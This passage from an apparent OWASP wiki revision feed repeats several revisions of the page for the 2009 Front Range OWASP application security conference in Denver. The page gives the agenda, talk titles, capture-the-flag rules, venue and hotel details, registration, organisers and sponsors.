 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter The Stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson, Trustwave''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Capture the Flag (CTF)==&lt;br /&gt;
&lt;br /&gt;
This year FROC will be hosting a capture the flag game / contest throughout the day. The CTF consists of a LAMP web server target and a scoreboard. &lt;br /&gt;
&lt;br /&gt;
Your job as a player is to successfully attack the small vulnerable web applications we provide to obtain hidden codes (called &amp;quot;flags&amp;quot;.)  Enter a flag into the scoreboard and you're credited with the point value for that challenge.&lt;br /&gt;
&lt;br /&gt;
An entrant can be a team or an individual.  Small prizes will be given for the top three finishing entrants, but the greatest prize, of course, is bragging rights.  Winners will be announced (and prizes awarded) at the end of the conference as part of the conference wrap-up.&lt;br /&gt;
&lt;br /&gt;
Thanks to IBM for sponsoring this event and providing technical support.&lt;br /&gt;
&lt;br /&gt;
===CTF Rules===&lt;br /&gt;
&lt;br /&gt;
1. Don't attack other players.  The contest is about finding and exploiting vulnerabilities in the applications provided.  (yes, attacking application users is a real-world threat -- victims will be provided in the challenges where attacking a user is required.)&lt;br /&gt;
&lt;br /&gt;
2. Don't attack the infrastructure.  Networks, routers, and the scoreboard are all off-limits as targets of attack.&lt;br /&gt;
&lt;br /&gt;
Anyone discovered breaking these rules will earn banning, forfeiture of all points, and very bad karma.&lt;br /&gt;
&lt;br /&gt;
==Logistics==&lt;br /&gt;
&lt;br /&gt;
Venue: [http://maps.google.com/maps?hl=en&amp;amp;ie=UTF8&amp;amp;cid=0,0,17887458453474608109&amp;amp;fb=1&amp;amp;split=1&amp;amp;gl=us&amp;amp;dq=Tivoli+Student+Union+in+downtown+Denver,+CO&amp;amp;daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&amp;amp;geocode=2315206160437382962,39.746366,-105.007463&amp;amp;ei=jKOsSeKrM5O5twfLh4GDBg&amp;amp;z=16 Tivoli Student Union] in downtown 900 Auraria Pkwy # 325E&lt;br /&gt;
Denver, CO 80204 (303) 556-6330&lt;br /&gt;
&lt;br /&gt;
==Accommodations==&lt;br /&gt;
&lt;br /&gt;
OWASP has negotiated discounted rates with the Hotel Teatro.  Rooms under the SnowFROC rate are $189/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention SnowFROC.  The discounted rate will be available until Monday, March 2.&lt;br /&gt;
&lt;br /&gt;
==Transportation to the Conference==&lt;br /&gt;
===By plane===&lt;br /&gt;
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===How to get to the venue?===&lt;br /&gt;
See the [http://maps.google.com/maps?hl=en&amp;amp;ie=UTF8&amp;amp;cid=0,0,17887458453474608109&amp;amp;fb=1&amp;amp;split=1&amp;amp;gl=us&amp;amp;dq=Tivoli+Student+Union+in+downtown+Denver,+CO&amp;amp;daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&amp;amp;geocode=2315206160437382962,39.746366,-105.007463&amp;amp;ei=jKOsSeKrM5O5twfLh4GDBg&amp;amp;z=16 Map].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*By taxi: taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free&lt;br /&gt;
&lt;br /&gt;
*By car: there is plenty of parking at the Tivoli.  Parking validation will be provided for registered SnowFROC participants.&lt;br /&gt;
&lt;br /&gt;
==Registration and Conference Fees==&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!&lt;br /&gt;
&lt;br /&gt;
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
==Conference Committee==&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton -  kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
&amp;lt;!-- *Dirsec --&amp;gt;&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
&amp;lt;!-- *Fortify --&amp;gt;&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
&amp;lt;!-- *Symplify --&amp;gt;&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=56110</id>
		<title>Front Range OWASP Conference 2009</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=56110"/>
				<updated>2009-03-04T19:03:04Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:SnowFROCblue.jpg]]&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!&lt;br /&gt;
&lt;br /&gt;
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! &lt;br /&gt;
&lt;br /&gt;
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''&lt;br /&gt;
&lt;br /&gt;
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009.  This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Conference Location==&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will be held at the [http://maps.google.com/maps?hl=en&amp;amp;ie=UTF8&amp;amp;cid=0,0,17887458453474608109&amp;amp;fb=1&amp;amp;split=1&amp;amp;gl=us&amp;amp;dq=Tivoli+Student+Union+in+downtown+Denver,+CO&amp;amp;daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&amp;amp;geocode=2315206160437382962,39.746366,-105.007463&amp;amp;ei=jKOsSeKrM5O5twfLh4GDBg&amp;amp;z=16 Tivoli Student Union] in downtown 900 Auraria Pkwy # 325E&lt;br /&gt;
Denver, CO 80204 (303) 556-6330&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Call for Presentations==&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09.  We received a tremendous response.  Thanks to everybody who responded!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 5 March 2009==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;Top Ten Web Hacking Techniques of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 09:45-10:15 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | OWASP State of the Union&lt;br /&gt;
''Tom Brennan, OWASP Board''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:15-10:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 10:30-11:15 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | &amp;quot;[[sfroc_bellis_abstract|Doing More with Less: Automate or Die]]&amp;quot;&lt;br /&gt;
''Ed Bellis, Orbitz''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Zusman|&amp;quot;Poor Man's Guide to Breaking PKI: Why You Don't Need 200 Playstations&amp;quot;]]&lt;br /&gt;
''Mike Zusman, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 11:15-12:00 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Paller|&amp;quot;A Legal Minimum Standard of Due Care: The CAG and the Top 25 Most Dangerous Programming Errors&amp;quot;]]&lt;br /&gt;
''Alan Paller, SANS''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Stads|&amp;quot;Adobe Flex, AMF 3 and BlazeDS: An Assessment&amp;quot;]] &lt;br /&gt;
''Kevin Stadmeyer, Trustwave''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 12:00-13:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Lunch - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope]&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | || style=&amp;quot;width:40%; background:#BC857A&amp;quot; | Management / Executive Track: Room 1&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; | Deep Technical Track: Room 2&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:00-13:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Peloquin|&amp;quot;Building an Effective Application Security Program&amp;quot;]]&lt;br /&gt;
''Joey Peloquin, Fishnet Security''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Belani|&amp;quot;Bad Cocktail: Spear Phishing + Application Hacks&amp;quot;]]&lt;br /&gt;
''Rohyt Belani, Intrepidus Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 13:50-14:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Byrne|&amp;quot;Automated vs. Manual Security: You can't filter The Stupid&amp;quot;]]&lt;br /&gt;
''David Byrne &amp;amp; Charles Henderson, Trustwave''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Damele|&amp;quot;SQL injection: Not only AND 1=1&amp;quot;]]&lt;br /&gt;
''Bernardo Damele Assumpcao Guimaraes, Portcullis Computer Security Ltd.''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 14:50-15:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Break - Expo - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
|-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:00-15:50 || style=&amp;quot;width:40%; background:#BC857A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Abstract_Neucom|&amp;quot;Security Policy Management: Best Practices for Web Services and Application Security&amp;quot;]]&lt;br /&gt;
''Ray Neucom, IBM''&lt;br /&gt;
 | style=&amp;quot;width:40%; background:#BCA57A&amp;quot; align=&amp;quot;left&amp;quot; | [[SnowFROC_Cornell_Dickson_Abstract|&amp;quot;Vulnerability Management in an Application Security World&amp;quot;]]&lt;br /&gt;
''Dan Cornell &amp;amp; John Dickson, Denim Group''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 15:50-16:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Panel: Emerging Threats and Enterprise Countermeasures&lt;br /&gt;
Moderator: John Dickson&amp;lt;br/&amp;gt;&lt;br /&gt;
Panelists: Alan Paller, Joey Peloquin, Rohyt Belani, Ed Bellis, Laz, Ray Neucom&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 16:30-17:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:40%; background:#F2F2F2&amp;quot; align=&amp;quot;left&amp;quot; | Conference Wrap Up, CTF Awards &amp;amp; Sponsor Raffles - CTF - Beatz by [http://www.dj-jackalope.com/ DJ Jackalope] &lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 17:30-21:00 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | OWASP Social Gathering: Dinner and Drinks @ TBD&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- Back to [https://www.owasp.org/index.php/Front_Range_OWASP_Conference_2009 SnowFROC Home] --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Logistics==&lt;br /&gt;
&lt;br /&gt;
Venue: [http://maps.google.com/maps?hl=en&amp;amp;ie=UTF8&amp;amp;cid=0,0,17887458453474608109&amp;amp;fb=1&amp;amp;split=1&amp;amp;gl=us&amp;amp;dq=Tivoli+Student+Union+in+downtown+Denver,+CO&amp;amp;daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&amp;amp;geocode=2315206160437382962,39.746366,-105.007463&amp;amp;ei=jKOsSeKrM5O5twfLh4GDBg&amp;amp;z=16 Tivoli Student Union] in downtown 900 Auraria Pkwy # 325E&lt;br /&gt;
Denver, CO 80204 (303) 556-6330&lt;br /&gt;
&lt;br /&gt;
==Accommodations==&lt;br /&gt;
&lt;br /&gt;
OWASP has negotiated discounted rates with the Hotel Teatro.  Rooms under the SnowFROC rate are $189/night and include courtesy Cadillac Escalade transportation to and from Auraria Campus. To reserve a room, contact Hotel Teatro at +1.303.228.1100 and mention SnowFROC.  The discounted rate will be available until Monday, March 2.&lt;br /&gt;
&lt;br /&gt;
==Capture the Flag (CTF)==&lt;br /&gt;
&lt;br /&gt;
This year FROC will be hosting a capture the flag game / contest throughout the day. The CTF consists of a LAMP web server target and a scoreboard. &lt;br /&gt;
&lt;br /&gt;
Your job as a player is to successfully attack the small vulnerable web applications we provide to obtain hidden codes (called &amp;quot;flags&amp;quot;.)  Enter a flag into the scoreboard and you're credited with the point value for that challenge.&lt;br /&gt;
&lt;br /&gt;
An entrant can be a team or an individual.  Small prizes will be given for the top three finishing entrants, but the greatest prize, of course, is bragging rights.  Winners will be announced (and prizes awarded) at the end of the conference as part of the conference wrap-up.&lt;br /&gt;
&lt;br /&gt;
Thanks to IBM for sponsoring this event and providing technical support.&lt;br /&gt;
&lt;br /&gt;
===CTF Rules===&lt;br /&gt;
&lt;br /&gt;
1. Don't attack other players.  The contest is about finding and exploiting vulnerabilities in the applications provided.  (yes, attacking application users is a real-world threat -- victims will be provided in the challenges where attacking a user is required.)&lt;br /&gt;
&lt;br /&gt;
2. Don't attack the infrastructure.  Networks, routers, and the scoreboard are all off-limits as targets of attack.&lt;br /&gt;
&lt;br /&gt;
Anyone discovered breaking these rules will earn banning, forfeiture of all points, and very bad karma.&lt;br /&gt;
&lt;br /&gt;
==Transportation to the Conference==&lt;br /&gt;
===By plane===&lt;br /&gt;
Denver can be reached by commercial aviation through the [http://www.flydenver.com/ Denver International Airport], which is a hub for United Airlines as well as Frontier.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===How to get to the venue?===&lt;br /&gt;
See the [http://maps.google.com/maps?hl=en&amp;amp;ie=UTF8&amp;amp;cid=0,0,17887458453474608109&amp;amp;fb=1&amp;amp;split=1&amp;amp;gl=us&amp;amp;dq=Tivoli+Student+Union+in+downtown+Denver,+CO&amp;amp;daddr=900+Auraria+Pkwy+%23+325E,+Denver,+CO+80204&amp;amp;geocode=2315206160437382962,39.746366,-105.007463&amp;amp;ei=jKOsSeKrM5O5twfLh4GDBg&amp;amp;z=16 Map].&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*By taxi: taxi from the airport to venue is about $50 USD&lt;br /&gt;
&lt;br /&gt;
*From hotel: transport from the conference hotel (Hotel Teatro) by limo is free&lt;br /&gt;
&lt;br /&gt;
*By car: there is plenty of parking at the Tivoli.  Parking validation will be provided for registered SnowFROC participants.&lt;br /&gt;
&lt;br /&gt;
==Registration and Conference Fees==&lt;br /&gt;
&lt;br /&gt;
Due to the hard work of our organizers and the gracious support of our sponsors, SNOWFROC will once again be a FREE CONFERENCE!!!&lt;br /&gt;
&lt;br /&gt;
Despite the fact that this is a free conference, we still need you to register to ensure that we don't exceed venue capacity.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
==Conference Committee==&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
SNOWFROC 2009 Planning Committee Chair: Kathy Thaxton -  kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Colorado Chapter Hosts:&lt;br /&gt;
* David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
* Eric Duprey - OWASP Denver - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
Vendor Exhibition Chair: Kathy Thaxton - kthaxton 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
Capture the Flag Chair: Eric Duprey - eduprey 'at' exploits.org&lt;br /&gt;
&lt;br /&gt;
CFP Chair: David Campbell - OWASP Denver - dcampbell 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
==[[OWASP AppSec Conference Sponsors | Conference Sponsors]]==&lt;br /&gt;
&lt;br /&gt;
The following organizations are proud sponsors of this conference:&lt;br /&gt;
*Accuvant&lt;br /&gt;
*Breach&lt;br /&gt;
*Business Partner Solutions&lt;br /&gt;
*Denim Group&lt;br /&gt;
&amp;lt;!-- *Dirsec --&amp;gt;&lt;br /&gt;
*Fishnet Security&lt;br /&gt;
&amp;lt;!-- *Fortify --&amp;gt;&lt;br /&gt;
*IBM&lt;br /&gt;
*Imperva&lt;br /&gt;
*Laz&lt;br /&gt;
*Lares&lt;br /&gt;
&amp;lt;!-- *Symplify --&amp;gt;&lt;br /&gt;
*Trustwave&lt;br /&gt;
*WhiteHat Security&lt;br /&gt;
&lt;br /&gt;
If you are interested in sponsoring this OWASP conference, please contact Kathy Thaxton at kthaxton 'at' owasp.org.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
More information about conference sponsorship is available [[OWASP AppSec Conference Sponsors | here]].&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Eduprey</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=55333</id>
		<title>Front Range OWASP Conference 2009</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Front_Range_OWASP_Conference_2009&amp;diff=55333"/>
				<updated>2009-02-23T22:30:25Z</updated>
		
		<summary type="html">&lt;p&gt;Eduprey: /* Accommodations */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:SnowFROCblue.jpg]]&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
Welcome to SnowFROC, the Winter 2009 Front Range OWASP Application Security Conference!&lt;br /&gt;
&lt;br /&gt;
After a successful FROC in June of 2008, we are back in Denver, Colorado USA on 5 March 2009! &lt;br /&gt;
&lt;br /&gt;
'''This year we again present a full day, FREE multi-track conference, which will provide valuable information for managers and executives as well as developers and engineers.'''&lt;br /&gt;
&lt;br /&gt;
In 2008, we attracted a packed venue with our great AppSec speakers, and we hope to achieve the same again in 2009.  This year we organized the conference to occur during the peak of the [http://www.google.com/search?q=colorado+skiing Colorado ski season], so that speakers can head up to the nearby mountains before and/or after the conference to enjoy some of the legendary snow.&lt;br /&gt;
&lt;br /&gt;
[https://snowfroc.electricalchemy.net CLICK HERE TO REGISTER]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Conference Location==&lt;br /&gt;
[[Image:Denver_mountains.JPG]]&lt;br /&gt;
&lt;br /&gt;
This year, the conference will be held at the Tivoli Student Union in downtown Denver, CO.&lt;br /&gt;
&lt;br /&gt;
==Call for Presentations==&lt;br /&gt;
The [[Front_Range_OWASP_Conference_2009_CFP|call for papers]] closed on 6 Feb 09.  We received a tremendous response.  Thanks to everybody who responded!&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ===[[SnowFROC Tentative Schedule]]=== --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Agenda and Presentations: 5 March 2009==&lt;br /&gt;
&lt;br /&gt;
The agenda follows the successful OWASP conference two tracks format, with opening keynotes and presentations in the main auditorium, split tracks in the middle of the day, and closing panel discussions back in the main auditorium.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width:80%&amp;quot; border=&amp;quot;0&amp;quot; align=&amp;quot;center&amp;quot;&lt;br /&gt;
 ! colspan=&amp;quot;3&amp;quot; align=&amp;quot;center&amp;quot; style=&amp;quot;background:#4058A0; color:white&amp;quot; | March 5, 2009&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 07:30-08:30 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#C2C2C2&amp;quot; align=&amp;quot;left&amp;quot; | Registration and Continental Breakfast in the Sponsor Expo Room&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:30-08:35 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Welcome to SnowFROC AppSec 2009 Conference &lt;br /&gt;
''David Campbell, OWASP Denver''&lt;br /&gt;
 |-&lt;br /&gt;
 | style=&amp;quot;width:10%; background:#7B8ABD&amp;quot; | 08:35-09:45 || colspan=&amp;quot;2&amp;quot; style=&amp;quot;width:80%; background:#F2F2F2&amp;quot; align=&amp;quot;center&amp;quot; | Keynote: [[SnowFROC_Abstract_Grossman|&amp;quot;Top Ten Web Hacking Techniques of 2008: What's possible, not probable&amp;quot;]]&lt;br /&gt;
''Jeremiah Grossman, Whitehat Security''&lt;br /&gt;
